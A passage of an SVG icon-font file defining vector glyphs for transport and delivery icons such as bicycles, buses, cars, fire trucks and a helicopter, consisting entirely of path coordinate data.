<glyph glyph-name="bicycle-alt-2" horiz-adv-x="1000" unicode="&#xee13;" d="M770 405c-15 0-29-2-43-6-1 9-3 18-4 27 5-2 10-3 16-3h57c26 0 37 21 37 47v57c0 26-21 47-47 47h-125c-25 25-61 47-111 58 0 0-12 1-12-11 0-12 5-13 15-16 38-9 87-42 108-68-20-33-117-180-270-223l-64 188 38 4c11 0 21 10 21 21 0 12-10 21-21 21l-104 13c-12 0-21-22-21-34 0-11 9-34 21-34l37 5-27-78h-100c-11 0-19-9-19-19 0-5 2-10 6-13-56-27-95-85-95-151 0-93 75-168 168-168 88 0 160 68 167 155l37 0c10-11 25-18 42-18 11 0 20 3 29 8l21-30-15-19 10-8 22 26 0 1 14 18-10 8-12-15-12 15-8 11c12 11 20 27 20 44 0 4 0 7-1 10 64 53 132 131 159 167 3-18 5-35 9-51-60-26-101-86-101-154 0-93 75-168 168-168 92 0 168 75 168 168 0 92-76 168-168 168z m-449 39l30-91c-14 15-32 28-52 37l22 54z m-78-66c5 0 9-1 13-2l-13-38v40z m0-124l46 112c46-21 78-65 83-116h-129v4z m-12-159c-79 0-143 63-143 142 0 69 51 127 117 139v-135h0v-17l167 0c-6-72-67-129-141-129z m189 155h-22c-1 13-4 25-7 37 13 4 26 8 38 13-7-10-11-22-11-35 0-5 1-10 2-15z m393 220c0-15-2-27-17-27h-57c-8 0-15 4-20 9-1 8-2 15-2 23 0 0-1 6-4 14h100v-19z m-289-169c-10 13-26 22-43 23 103 57 170 149 195 188 7-12 11-23 13-30-29-40-101-125-165-181z m155 253h107c15 0 27-12 27-27v-18h-107c-6 13-15 29-27 45z m91-459c-79 0-143 63-143 142 0 56 33 105 81 128 22-92 54-143 56-146l22 14c-1 1-32 51-53 141 11 3 24 5 37 5 78 0 142-64 142-142 0-79-64-142-142-142z" />
<glyph glyph-name="bicycle" horiz-adv-x="1000" unicode="&#xee14;" d="M499 423c-28-2-42-14-42-40v-214c0-72 1-144 0-216 0-13 3-23 14-31 19-13 40-11 60-4 19 6 22 23 22 40 0 138-1 276 0 413 0 35-10 54-54 52z m-177-154h-111c-4 0-7-3-7-6v-37c0-4 3-7 7-7h111c4 0 7 3 7 7v37c0 3-3 6-7 6z m467-90h-112c-4 0-7-3-7-7v-36c0-4 4-7 7-7h112c4 0 7 3 7 7v36c0 4-3 7-7 7z m-63 451c4 0 7 3 7 7 0 22 0 92 0 114 0 4-3 7-7 7-29 0-148 0-177 0-4 0-7 2-7 4v19c0 4-3 7-7 7h-61c-4 0-7-3-7-7v-19s-3-4-6-4h-178c-4 0-7-1-7-1v-120c0-4 3-6 7-6h54c4 0 7 2 7 6v72c0 4 3 7 6 7h110c4 0 7-3 7-7v-37c0-4-3-6-7-6h-38c-4 0-7-3-7-7v-37c0-4 3-7 7-7h18c4 0 7-2 7-6 0-28 0-55 0-82-1-3-3-6-6-8-24-24-49-47-73-70-4-4-7-11-7-16 0-81 0-162 0-243 0-2 0-3 0-5 0-3 4-6 7-6h49c4 0 7 3 7 6v6c0 74 0 148 0 222 0 7 2 12 7 17 13 12 27 23 38 37 12 14 26 20 45 17 4-1 10-3 13-6 17-16 32-32 49-48 6-5 8-11 8-18-1-73 0-147 0-220v-6s3-7 6-7h49c4 0 7 2 8 5 0 1 0 3 0 4 0 82 0 165 0 247 0 5-3 10-7 14-23 23-47 45-70 68-3 3-6 6-6 10-1 27-1 54-1 82 0 4 3 7 7 7h17c4 0 7 3 7 6v38c0 3-3 6-7 6h-38c-4 0-7 3-7 7v36c0 4 3 7 7 7h109c4 0 7-3 7-7v-72c0-4 3-6 7-6l54-1z" />
<glyph glyph-name="bus-alt-1" horiz-adv-x="1000" unicode="&#xee15;" d="M897 652h-40c-7 0-12-6-12-12v-197c0-7 6-12 12-12h14v-89c0-7-6-12-12-12h-37v334c0 68-55 124-123 124h-406c-68 0-123-56-123-124v-328h-30c-7 0-12 5-12 12v96h15c7 0 12 5 12 12v197c0 6-6 11-12 11h-41c-6 0-11-5-11-11v-197c0-7 5-12 11-12h16v-106c0-7 5-12 11-12h41v-242c0-46 26-86 63-107v-53c0-6 5-11 12-11h85c7 0 12 5 12 11v37h305v-37c0-6 5-11 11-11h86c6 0 12 5 12 11v51c39 21 66 62 66 110v234h47c6 0 12 6 12 12v100h16c7 0 12 5 12 12v197c0 6-5 12-12 12z m-542 98c0 7 5 12 12 12h263c7 0 12-5 12-12v-43c0-7-5-12-12-12h-263c-7 0-12 6-12 12l0 43z m31-649c0-6-6-11-12-11h-136c-6 0-11 5-11 11v49c0 6 5 11 11 11h136c6 0 11-5 11-11l1-49z m385 0c0-6-6-11-12-11h-136c-6 0-11 5-11 11v49c0 6 5 11 11 11h136c6 0 12-5 12-11v-49z m0 219s-31-97-278-97c-246 0-272 97-272 97v339h549v-339z" />
<glyph glyph-name="bus-alt-2" horiz-adv-x="1000" unicode="&#xee16;" d="M257 267c-45 0-82-37-82-82s37-81 82-81 81 37 81 81-37 82-81 82z m0-117c-20 0-36 16-36 35s16 36 36 36 35-16 35-36c0-19-16-35-35-35z m477 117c-45 0-82-37-82-82s37-81 82-81 81 37 81 81-36 82-81 82z m0-117c-20 0-36 16-36 35s16 36 36 36c19 0 35-16 35-36s-16-35-35-35z m155 446h-729c-27 0-53-21-59-48l-29-106c-5-26-9-69-9-96v-112c0-27 21-49 48-49h50c0 53 43 96 96 96s95-43 95-96h286c0 53 43 96 96 96s96-43 96-96h59c27 0 49 22 49 49v313c-1 27-22 49-49 49z m-625-205h-113l18 42c3 8 0 16-8 20-7 3-16-1-19-8l-22-53c-15 4-24 18-21 35l26 104c4 20 23 36 43 36h96l0-176z m217 0h-187v176h187v-176z m216 0h-187v176h187v-176z m211 36c0-20-17-36-37-36h-145v176h145c20 0 37-17 37-37l0-103z" />
<glyph glyph-name="bus-alt-3" horiz-adv-x="1000" unicode="&#xee17;" d="M765 788h-531c-54 0-98-48-98-108v-577c0-33 14-63 36-83v-79c0-16 13-29 28-29h105c16 0 28 13 28 29v54h87v1l246-1v-54c0-16 13-29 29-29h104c16 0 29 13 29 29v79c22 20 36 50 36 83v577c0 60-44 108-99 108z m-419-46h307v-30h-307v30z m62-571h-194v71h194v-71z m-184 233c-15 0-28 6-28 13v255c0 7 13 13 28 13h551c16 0 29-6 29-13v-255c0-8-13-13-29-13h-551z m378-233v71h194v-71h-194z" />
<glyph glyph-name="bus" horiz-adv-x="1000" unicode="&#xee18;" d="M882 469c-1 0-2 0-3 0-3 79-6 158-9 237-2 51-35 81-86 81-64 1-129 0-193 0-126 0-251 1-377 0-49 0-82-31-84-79-3-80-7-159-10-239 0 0-1 0-2 0-9 0-17-10-17-22v-74c0-12 6-21 15-23-3-65-4-129-7-194-2-40 6-75 30-107 2-4 3-9 3-14 0-28 0-57 0-85 0-20 11-35 31-36 28-2 57-2 85 0 20 1 31 15 31 36v41h422v-41c0-21 12-35 32-36 28-2 55-2 83 0 20 1 32 15 32 36 0 27-1 55 0 82 0 8 2 16 7 21 18 28 28 58 26 91-2 69-5 137-7 206 8 1 15 11 15 23v74c0 12-7 22-17 22z m-443 279c21 0 41 0 61 0 20 0 41 0 61 0 17 0 26-9 27-24 0-15-10-25-27-25-41 0-81 0-122 0-17 0-27 10-27 26 1 14 10 23 27 23z m-192-648c-38 0-67 30-67 69 0 38 30 67 68 67 38 0 68-30 68-68 0-38-30-68-69-68z m531 212c-55-8-110-14-166-18 0 47 39 86 86 86 41 0 75-29 84-67-2-1-3-1-4-1z m-26-212c-38 0-68 30-68 68 0 12 3 23 8 33 2 2 3 5 5 7 12 17 32 28 55 28 3 0 6 0 9 0 3-1 6-1 9-2 29-7 50-34 50-66 0-38-30-68-68-68z m71 263c0-24-13-41-34-48-9 41-47 73-91 73-52 0-93-42-93-94v0c-34-3-68-4-102-4-95-1-190 6-283 22-28 4-43 22-43 50 2 87 4 173 6 260 1 18 13 30 31 31 72 4 144 9 216 11 71 2 142 1 212-1 49-1 97-6 145-10 18-1 29-14 29-32 1-45 7-125 7-133 0-42 0-83 0-125z" />
<glyph glyph-name="cab" horiz-adv-x="1000" unicode="&#xee19;" d="M891 399c25 1 47 24 46 49 0 26-21 47-48 47-15 0-31 1-46 0-9 0-13 3-16 11-13 31-26 61-40 91-12 27-33 40-62 40-149 1-298 0-447 1-33 0-55-15-68-45-12-30-25-59-38-89-3-7-6-9-14-9-15 1-30 0-46 0-28 0-49-20-50-47 0-27 22-49 51-49 5 0 10 0 18 0-3-8-5-14-7-21-7-28-18-56-19-85-3-90-3-180-3-270 0-32 21-57 52-61 19-2 39-2 58 1 29 3 53 22 50 59-1 12 0 24 0 36h475v-39c0-30 15-50 45-55 15-3 31-2 47-2 44-1 68 23 68 68 0 73 1 147 0 221 0 39-4 79-19 116-3 10-6 20-10 32l23 0z m-678-198c-28-1-50 21-50 49 0 28 21 49 49 49 28 1 49-21 49-49 0-27-21-49-48-49z m7 199c4 16 9 30 13 44 12 40 24 79 35 119 3 8 6 12 16 12 144-1 288 0 433 0 6 0 11 0 14-9 16-54 32-108 48-162 1-1 0-2 0-4h-559z m568-199c-27 0-49 22-49 50 0 27 21 49 48 49 28 0 50-22 50-49 0-28-21-50-49-50z m-129 459h-21l-1 27h-29c0-9 0-18 0-27h-28v27h-29v-27h-27v27h-34v-27h-27v27h-29v-27h-28c0 9 0 18 0 27h-29c0-9 0-18-1-27h-20c-1-7-1-15-1-22h304c0 7 0 15 0 22z m-282 56h29v-29h28v29h30v-29h26v29h34v-29h27v29h29v-29h28v29h30v-29h21c0 4 0 8-1 12-3 24-21 39-46 39-69 1-139 1-209 0-21 0-41-15-44-35-1-5-1-11-2-16h20v29z" />
<glyph glyph-name="cable-car" horiz-adv-x="1000" unicode="&#xee1a;" d="M788 442h-20c0 1 0 2 0 4v19c0 9-7 16-16 16h-235v192l414 86-6 29-855-177 6-29 408 84v-185h-236c-9 0-16-7-16-16v-19c0-2 0-3 0-4h-19c-45 0-82-37-82-81v-371h738v371c0 44-36 81-81 81z m-324-292c0-4-4-8-9-8h-162c-5 0-8 4-8 8v227c0 5 3 8 8 8h162c5 0 9-3 9-8v-227z m252 0c0-4-4-8-8-8h-163c-4 0-8 4-8 8v227c0 5 4 8 8 8h163c4 0 8-3 8-8v-227z m-503-238h575c36 0 66 24 77 57h-729c10-33 41-57 77-57z" />
<glyph glyph-name="car-alt-1" horiz-adv-x="1000" unicode="&#xee1b;" d="M937 480c0 15-7 23-23 23-13 0-25-1-37 0-18 1-30-5-38-22-2-6-9-11-15-19-2 7-4 10-4 14-15 48-34 95-60 140-10 19-26 32-47 38-11 4-21 8-33 9-50 4-100 9-151 10-70 2-140 1-210-10-40-6-71-23-87-62-13-30-27-61-40-91-6-15-10-30-15-44l-3-2c-5 7-11 14-16 22-5 10-13 17-25 17-16 0-33 0-49 0-13-1-20-8-21-20-1-9-1-17 0-26 1-13 8-21 22-21 17 0 34 0 51 0h28c-3-3-5-5-6-6-25-23-43-50-51-82-18-64-9-127 15-189 7-17 20-29 38-36 6-2 8-6 8-13 0-17 0-34 0-52 0-20 11-30 32-30 3 0 6 0 8 0 61-2 66 1 64 61 0 4 0 9 0 13 77-2 152-6 227-6 76 0 152 4 229 6 0-15 0-30 0-45 1-18 12-29 30-29 14 0 29 0 43 0 20 0 31 11 31 30 0 18 0 36 1 53 0 4 2 9 5 10 28 12 43 35 49 63 7 30 12 60 15 91 5 61-16 113-61 156-1 1-2 3-4 5h13c21 0 42 0 63 0 17 1 24 8 25 24 0 6 0 13-1 20z m-689 21c12 30 27 60 41 89 2 5 8 9 13 10 38 12 78 18 117 18 63 1 126 1 188-2 31-1 61-10 92-16 4-1 9-5 11-8 27-42 45-88 55-136 0-1 0-2 0-4-177 23-353 23-532-1 5 18 8 35 15 50z m-28-272c-30 0-55 23-55 53-1 29 25 54 55 54 30 0 55-24 55-54 0-29-25-53-55-53z m436 84c-7-24-15-47-22-70-2-9-7-13-16-13-79 1-157 1-236 0-8 0-13 4-16 12l-23 73c-4 12 1 19 15 19 47 0 95 0 142 0h140c17 0 21-6 16-21z m124-84c-30 0-55 25-55 54 1 29 26 53 56 53 29 0 55-25 54-54 0-30-25-54-55-53z" />
<glyph glyph-name="car-alt-2" horiz-adv-x="1000" unicode="&#xee1c;" d="M930 303l-2 1c-1 1-1 5 0 11 3 10 6 20 8 30 4 15-3 29-17 35-5 2-10 3-15 4-61 6-122 13-183 19-6 1-11 3-16 7-24 26-49 52-72 78-12 15-27 21-45 21-85-1-169-1-253-2-26 0-48-9-65-31-14-21-33-38-48-58-10-13-23-17-39-19-31-3-61-9-92-13-13-2-19-9-20-22 0-13-3-25 7-37 4-4 2-8-3-11-8-4-14-10-12-19 1-9 8-14 16-17l10-2c3-1 5-2 7-4 6-4 13-11 20-12 19-3 39-5 58-5 19 0 25 6 29 25 7 32 34 54 66 55 43 0 69-33 70-63 1-19 8-25 28-25 50 0 101 0 152 0 59 0 118 0 178 0 32 0 41 6 50 37 8 28 32 48 61 51 28 2 55-14 68-40 5-8 10-16 15-24 4-5 10-8 14-2 5 8 12 8 20 8 6 0 10 3 12 9 1 7-1 12-7 15z m-462 110c0-5-4-9-10-9h-154c-5 0-7 3-4 8 14 21 27 41 41 61 5 5 14 10 21 11 34 1 68 1 103 1 0 0 1 0 1 0 1-1 2-5 2-10 0-21 0-41 0-62z m192-9h-157c-5 0-10 4-10 9v62c0 6 4 10 10 10h70c3 0 6-1 9-1 15 3 26-4 35-16 15-19 30-37 46-57 4-4 2-7-3-7z m-390-81c-36 0-65-29-65-65-1-36 28-66 64-66 37-1 67 29 67 66 0 36-30 65-66 65z m0-108c-23 0-43 19-42 42 0 24 16 43 42 43 25 0 43-21 42-43 0-23-18-41-42-42z m545 108c-37 0-66-29-66-66 0-36 30-65 66-65 36 0 65 29 65 65 0 36-29 66-65 66z m-1-107c-24 0-42 18-42 43 1 24 20 42 43 41 29-1 43-24 42-44-1-23-20-41-43-40z" />
<glyph glyph-name="car-alt-3" horiz-adv-x="1000" unicode="&#xee1d;" d="M925 282c-31 78-93 121-170 142-29 7-47 21-63 45-132 202-417 178-528 57-73-80-97-178-101-283-2-32 20-48 52-49 27 87 67 121 138 120 68-1 108-36 132-119h205c18 75 57 114 117 119 76 6 114-24 151-119 78-9 95 15 67 87z m-651 125c-25 1-49 0-74 1-32 1-46 17-30 48 39 72 102 111 182 124 10 1 26-16 36-27 4-5 2-17 2-25 0-133 11-121-116-121z m378 2c-32-2-64-1-95-1v0c-31 0-61-1-91 0-28 0-43 15-43 43 0 30-1 61 0 91 1 28 17 43 45 38 87-16 154-63 201-137 14-20 7-33-17-34z m-402-118c-63 0-107-43-107-105 1-57 48-104 105-104 59-1 107 47 106 107-1 61-43 102-104 102z m-1-157c-30 0-53 23-53 52 0 30 23 54 53 54 29 0 53-24 53-54 0-29-24-52-53-52z m471 157c-61 1-105-42-106-101-1-60 46-108 106-109 56 0 109 52 107 108 0 56-49 102-107 102z m1-157c-29 0-53 23-53 52 0 30 24 54 53 54 29 0 53-24 53-54 0-29-24-52-53-52z" />
<glyph glyph-name="car-alt-4" horiz-adv-x="1000" unicode="&#xee1e;" d="M936 372c-1 40-24 72-63 86-12 4-18 11-22 21-20 55-42 109-63 164-20 53-50 73-107 73-121 0-242 0-363 0-56 0-86-20-106-72-22-56-44-112-66-168-2-6-7-13-13-15-49-20-70-52-70-105v-222c0-2 1-4 3-4 18 0 34-1 51 0 13 1 18-3 17-17 0-25-1-51 1-76 3-36 39-60 73-52 32 8 50 31 50 66 1 25 0 49 0 74 0 2 2 4 4 4h476c2 0 3-2 3-4 0-24 0-48 1-73 1-50 38-79 82-65 24 7 40 27 41 52 1 28 0 57 0 87 0 2 2 4 4 4h64c2 0 4 1 4 3 0 81 2 160-1 239z m-738-106c-37 0-67 31-66 68 1 36 31 66 66 66 36 0 65-30 64-68 0-37-28-66-64-66z m15 198c-2 0-3 2-3 4 0 2 1 4 1 6 18 49 36 97 55 146 11 29 21 35 51 35h156v-8c0-2 1-4 3-4h48c2 0 3 2 3 4v8c52 0 104 0 156 0 23 1 40-7 49-29 19-52 38-104 57-156 1-1 1-2 1-3 0-2-2-3-4-3h-36c-12 38-47 65-88 65s-77-27-89-65h-360z m449 56c36 0 67-23 78-56h-156c11 33 42 56 78 56z m141-254c-36 0-65 28-66 65 0 38 28 69 64 69 36 1 67-31 67-67 0-37-30-67-65-67z" />
<glyph glyph-name="car" horiz-adv-x="1000" unicode="&#xee1f;" d="M879 434c10 1 20 0 31 0 19 0 27 9 27 32 1 23-7 33-27 34-10 0-21 0-31 0-29 0-46-18-48-49 14-12 30-18 48-17z m-48 17l0 1c-2 4-4 7-6 12-17 47-35 95-51 143-9 26-26 42-52 44-64 4-128 9-192 11-84 3-167-2-251-11-25-3-43-16-52-42-7-20-14-41-21-61-11-31-23-61-35-94-2 5-3 9-4 13-10 25-21 33-46 33h-23c-29 0-39-12-35-43 2-14 10-23 24-23 28 1 57-7 83 15-8-12-17-23-26-33-11-11-25-19-34-31-8-10-16-23-17-36-2-35-2-71-2-107 0-14 0-28 0-43h-2c-4-27 6-48 29-56 8-3 9-7 9-15 0-21 0-41 0-62 1-20 6-28 22-28 26-1 52 0 78 1 9 0 15 5 16 15 1 12 3 23 3 35 0 11 4 14 15 14 86 0 173 0 260 0 74 0 147 0 221 0 10 0 14-3 14-14 0-8 1-17 1-25 1-19 6-25 23-25 23-1 45-1 68-1 21 0 26 6 27 30 0 20 0 41 0 61 0 7 1 11 8 14 24 9 35 31 30 57h-3c1 3 2 6 2 9-1 35 0 71-3 107-3 45-22 82-60 107-8 5-12 19-19 29l1 0v-1z m-615 58c10 24 21 47 32 71 5 13 14 20 27 21 42 3 85 5 127 8 92 5 183 2 275-6 17-1 34-2 51-3 12-1 20-6 26-19 17-41 35-82 52-122 2-5 4-9 6-14h-624c10 22 18 43 28 64z m-81-199c0 15 8 24 22 24 38 1 77 1 115 0 13 0 22-9 23-23 1-13 1-25 0-37-1-15-10-24-23-24-19 0-38 0-58 0v0c-18 0-37 0-55 0-16 0-24 9-24 27 0 11-1 22 0 33z m731-1c0-11 0-22-1-32 0-15-8-25-22-25-38 0-77-1-116 0-15 0-22 10-22 26 0 10 0 21 0 32 0 17 9 27 25 27 18 0 37 0 56 0 18 0 35 0 53 0 17 0 26-10 27-28z" />
<glyph glyph-name="delivery-time" horiz-adv-x="1000" unicode="&#xee20;" d="M926 158h-27v153c0 18-5 36-15 51l-69 101c-17 25-45 40-75 40h-106c-12 0-22-10-22-23v-322h-174c16-14 28-34 31-56h183c7 44 45 79 92 79s85-35 91-79h91c7 0 12 5 12 11v34c-1 6-6 11-12 11z m-112 183h-140c-6 0-11 5-11 12v77c0 6 5 11 11 11h85c4 0 8-1 10-4l54-78c6-7 0-18-9-18z m-70-183c-39 0-70-31-70-70 0-38 31-70 70-70 38 0 70 32 70 70 0 39-32 70-70 70z m0-105c-20 0-35 16-35 35 0 20 15 35 35 35s35-15 35-35c0-19-16-35-35-35z m-584 105c-6 0-11-5-11-11v-34c0-6 5-11 11-11h126c3 22 15 42 31 56h-157z m217 0c-38 0-70-31-70-70 0-38 32-70 70-70 39 0 70 32 70 70 0 39-31 70-70 70z m0-105c-19 0-35 16-35 35 0 20 16 35 35 35s35-15 35-35c0-19-15-35-35-35z m169 519h-131c7-19 10-39 10-60 0-106-86-193-192-193-20 0-38 3-56 9v-125c0-6 5-11 11-11h380c7 0 12 5 12 11v336c0 18-16 33-34 33z m-313 110c-94 0-170-76-170-170 0-94 76-170 170-170 94 0 170 76 170 170 0 94-76 170-170 170z m0-301c-73 0-132 58-132 131s59 131 132 131 131-58 131-131c0-73-59-131-131-131z m50 103c-2 0-3 1-5 1l-54 15c-8 2-13 8-13 16v84c0 10 8 17 17 17 9 0 17-7 17-17v-71l42-11c9-3 14-12 12-21-2-8-9-13-16-13z" />
<glyph glyph-name="fast-delivery" horiz-adv-x="1000" unicode="&#xee21;" d="M387 251c-41 0-73-33-73-73s32-73 73-73 73 33 73 73c0 40-33 73-73 73z m0-110c-20 0-37 17-37 37 0 20 17 36 37 36s36-16 36-36c0-20-16-37-36-37z m551 164v-78c0-19-16-35-36-35h-37c-7 47-47 83-96 83-49 0-89-36-96-83h-191c-6 47-47 83-95 83-49 0-89-36-96-83h-47c-19 0-35 16-35 35v78h729z m-169-54c-40 0-73-33-73-73s33-73 73-73 73 33 73 73c0 40-33 73-73 73z m0-110c-20 0-36 17-36 37 0 20 16 36 36 36 20 0 37-16 37-36 0-20-17-37-37-37z m155 243l-139 137c-9 8-20 13-33 13h-70v26c0 20-15 36-35 36h-403c-19 0-35-16-35-36v-5l-143-17 253-33-256-25 255-36-255-23 146-27v-69h728v25c1 13-5 25-13 34z m-61-5h-134c-3 0-5 3-5 6v103c0 3 2 5 5 5h26c1 0 3 0 4-1l108-103c4-4 1-10-4-10z" />
<glyph glyph-name="fire-truck-alt" horiz-adv-x="1000" unicode="&#xee22;" d="M496 224c-15 0-31 1-46 0-8 0-11 2-10 10 0 26 0 52 0 78 0 7 2 10 9 10 31-1 62 0 93 0 7 0 9-2 9-9 0-27 0-54 0-80 0-7-3-9-9-9-16 1-31 1-46 0z m-433 111c5-6 3-17 14-20 1 0 1-3 2-5 6-12 12-25 17-38 3-7 4-15 6-23 0-2 1-4 3-6 20 8 40 17 60 25 180 77 360 153 541 230 6 2 14 4 20 4 51 0 102 0 154 0 8 0 11 2 11 11 0 35 0 71 0 106 0 9-3 11-11 11-52-1-104-1-155 0-8 0-12-2-11-10 1-6-2-9-7-11-126-53-252-107-378-160-87-37-173-73-259-110-2-1-4-2-7-4z m642 190c-20 10-40 21-62 34 17 7 32 13 47 20 8-17 15-33 22-48 0-2 0-6 0-6-2-1-5-1-7 0z m-100-46c5 23 11 45 16 67 2 7 7 7 13 4 12-7 24-13 36-20 8-4 15-8 24-13-31-13-59-25-89-38z m-14-6c-22 12-43 24-65 36 27 11 53 22 82 34-6-24-12-47-17-70z m-103-44c5 24 10 46 16 67 1 6 6 8 11 5 21-11 41-22 62-34-30-13-59-25-89-38z m-14-6c-22 12-43 24-65 36 27 12 53 23 82 35-6-25-12-47-17-71z m-104-44c6 24 11 46 17 68 2 5 6 7 12 4 6-3 13-7 19-11 13-7 27-15 42-23-30-13-59-25-90-38z m-14-5c-21 12-42 23-64 35 28 12 54 23 82 35-6-24-12-46-18-70z m-103-45c6 24 11 46 17 67 1 3 8 7 10 6 21-11 41-22 63-35-31-13-60-25-90-38z m-14-5c-21 12-42 23-64 36 28 11 54 22 81 34-5-24-11-47-17-70z m-103-44c6 23 11 45 17 67 1 6 6 7 12 4 20-10 39-21 61-33-31-13-60-25-90-38z m-42 45c15 7 29 13 46 20-8-26-11-50-19-73l-3 1c-8 17-16 34-24 52z m489 28c0-64 0-128 0-192 0-10 4-19 11-26 3-2 7-4 10-4 52-1 104 0 156 0 4 17 12 31 27 41 11 7 23 10 36 10 28-1 47-18 58-51 15 0 30 0 45 0 6 0 10 3 11 9 0 3 1 6 1 9 0 5 0 10 0 15 0 82 0 82-26 160-4 11-8 22-12 33-6 14-15 22-31 20-5-1-11 0-18 0 2 5 4 8 4 12 1 8 1 17 1 26 0 1-4 3-7 3-17 0-35 0-52 0-2 0-5-1-7-3-4-5-1-23 4-27 2-3 2-6 3-11h-189c-19 0-25-6-25-24z m185-121c1 2 3 4 5 5 4 0 9 0 13 0 5 0 9 0 14 0 2 0 4-3 5-4-1-2-3-5-4-6-10 0-19 0-28 0-2 1-5 4-5 5z m-14 113c41 0 80 0 119 0 8 0 12-5 15-12 6-18 13-36 19-54 2-5 2-12 3-19h-156v85z m-135-112c0 0 3 4 5 4 9 0 18 0 28 0 1 0 4-3 4-5 0-1-2-4-4-4-5-1-9-1-14-1-4 0-9 0-14 1-2 0-4 3-5 5z m-13 102c0 8 2 10 10 10 19 0 37 0 56 0s37 0 56 0c7 0 10-2 10-9-1-20-1-41 0-61 0-7-2-9-9-9-38 0-76 0-114 0-7 0-9 2-9 9 1 20 1 40 0 60z m-515-122c11 0 23 0 34 0h426c15 0 18-2 18-17v-49c0-15-3-18-18-18h-223c-14 38-32 53-64 53-28-1-48-18-58-53-39 0-77 0-115 0-8 0-13 4-13 13 1 19 1 39 0 58 0 9 4 13 13 13z m266 45v-35h-185c0 10-1 19 0 28 1 4 3 8 6 9 12 7 25 12 38 18 33 15 67 30 101 46 0-4 1-8 2-11 1-8-1-12-8-16l-40-20c-9-5-11-10-8-19 32 0 63 0 94 0z m-145-135c1-30 25-53 55-53 30 0 54 24 54 53 0 29-25 53-54 53-31 0-55-23-55-53z m24 0c0 16 14 29 30 30 17 0 30-13 30-30 0-16-13-29-30-29-16 0-30 13-30 29z m530 0c0-29 24-53 54-53 30 0 54 23 54 53 0 29-24 53-54 53-29 0-54-23-54-53z m24 0c0 17 13 30 30 30 17 0 31-14 30-30 0-16-13-29-30-29-17 0-30 13-30 29z m-378 227c9 0 12-3 12-12-1-30 0-60 0-90 0-24-1-24-27-20v11c0 31-1 63 0 95 0 17-4 15 15 16z" />
<glyph glyph-name="fire-truck" horiz-adv-x="1000" unicode="&#xee23;" d="M236 72h138c13 0 24 11 24 24v33c0 13 11 24 24 24 55 0 182 0 182 0v-56c0-14 11-25 24-25h139c13 0 24 11 24 25v466c0 13-11 24-24 24h-104l19 175c1 13-3 25-11 26-7 0-14-10-16-23l-1-9c-1 0-2 1-3 1h-287c-6 0-11-3-15-6l-2 14c-2 13-9 23-16 23-7-1-12-13-10-26l19-175h-104c-14 0-24-11-24-24v-467c0-13 10-24 24-24z m105 81c-30 0-54 24-54 54s24 53 54 53c29 0 53-24 53-53 0-30-24-54-53-54z m328-4c-30 0-54 24-54 53 0 30 24 54 54 54 29 0 53-24 53-54 0-29-24-53-53-53z m87 357v-98c0-13-11-24-24-24h-196c-13 0-24 11-24 24v98c0 13 11 24 24 24h196c13 0 24-11 24-24z m-392 207h285l-4-42c-2 0-5 1-7 1h-274c-2 0-4-1-7-1l-5 45c4-2 8-3 12-3z m1-114l-3 30c1 0 2-1 2-1h274c1 0 1 1 2 1l-3-30c-1-4-3-9-5-12h-262c-2 3-4 7-5 12z m-119-93c0 13 11 24 24 24h196c13 0 24-11 24-24v-98c0-13-11-24-24-24h-196c-13 0-24 11-24 24v98z m554-463h-172c-13 0-24-11-24-24v-3c0-13-11-24-24-24h-158c-13 0-24 11-24 24v3c0 13-11 24-24 24h-172c-13 0-24-11-24-24v-18c0-13 11-24 24-24h10c0-1 0-1 0-2v-38c0-14 10-25 24-25h45c13 0 24 11 24 25v38l0 2h393c0-1-1-1-1-2v-38c0-14 11-25 24-25h46c13 0 24 11 24 25v38l-1 2h10c13 0 24 11 24 24v18c0 13-11 24-24 24z m-378 29c-13 0-24-6-24-14s11-15 24-15h158c13 0 24 6 24 15 0 8-11 14-24 14h-158z m437 385h-29c-13 0-24-11-24-24v-96c0-13 11-24 24-24h29c14 0 24 11 24 24v96c0 13-10 24-24 24z m-665-120v96c0 13-11 24-24 24h-30c-13 0-24-11-24-24v-96c0-13 11-24 24-24h30c13 0 24 11 24 24z" />
<glyph glyph-name="free-delivery" horiz-adv-x="1000" unicode="&#xee24;" d="M938 304v-79c0-20-17-36-36-36h-39c-7 47-48 84-97 84-50 0-91-37-98-84h-326c-7 47-48 84-98 84s-90-37-97-84h-48c-20 0-36 16-36 36v79h875z m-628 192h-21l-7-39h20c13 0 24 9 24 25 0 9-6 14-16 14z m530-322c0-41-33-74-74-74-42 0-75 33-75 74 0 42 33 75 75 75 41 0 74-33 74-75z m-37 0c0 21-17 38-37 38-21 0-37-17-37-38 0-20 16-37 37-37 20 0 37 17 37 37z m-484 0c0-41-34-74-75-74s-74 33-74 74c0 42 33 75 74 75s75-33 75-75z m-38 0c0 21-16 38-37 38s-37-17-37-38c0-20 17-37 37-37s37 17 37 37z m657 150h-875v240c0 20 16 36 35 36h543c20 0 36-16 36-36v-26h72c12 0 24-5 33-14l141-140c9-9 14-21 14-34l1-26z m-748 137l7 35h49l3 19h-71l-24-124h22l10 50h42l3 20h-41z m131-17v0c19 6 28 24 28 41 0 13-6 23-16 27-6 2-12 3-18 3h-44l-24-124h22l9 46h23l15-46h24l-16 46c-2 5-3 7-3 7z m138 71h-74l-25-124h77l4 20h-54l6 33h42l4 19h-42l6 33h52l4 19z m100 0h-74l-24-124h77l3 20h-54l6 33h42l4 19h-42l6 33h52l4 19z m307-126l-111 106c-1 1-2 1-4 1h-26c-3 0-5-2-5-5v-106c0-3 2-5 5-5h137c5-1 7 6 4 9z" />
<glyph glyph-name="helicopter" horiz-adv-x="1000" unicode="&#xee25;" d="M900 302c-60 100-147 158-265 164-5 0-13 7-14 12l-12 52c-2 7-9 13-13 19-5-6-13-12-15-19-6-21-9-42-14-65-21 0-40 1-60 0-38-2-67-20-89-52-4-6-14-11-20-11-44-1-89-1-133-1h-122c0-22 8-31 31-34 71-10 142-24 213-35 13-2 19-7 24-19 26-73 78-111 155-112 82-1 165-1 247 1 28 0 56 5 84 11 21 5 28 21 22 42-4 17-10 33-19 47z m-56 21c-54 0-108-2-162 3-56 6-88 46-105 97-4 12 0 19 12 20 105 9 190-29 261-105 1-1 2-3 3-5 0-1 0-2 1-6-3-2-7-5-10-4z m46-144c-134 0-267 0-401 0-14 0-26-3-26-19-1-18 12-19 26-19 67 0 134 0 202 0v0c66 0 133 0 199 0 14-1 27 1 28 18 0 17-13 20-28 20z m-609 329c89 5 178 10 267 15 13 1 18 6 15 20-6 1-11 1-17 2-36 2-72 4-109 6-55 3-110 6-165 9-6 0-15-2-17-6-14-24 1-48 26-46z m638 52c-57-4-114-7-171-10-41-2-81-5-122-7-1-13 2-19 16-20 87-5 174-10 261-15 35-2 34-1 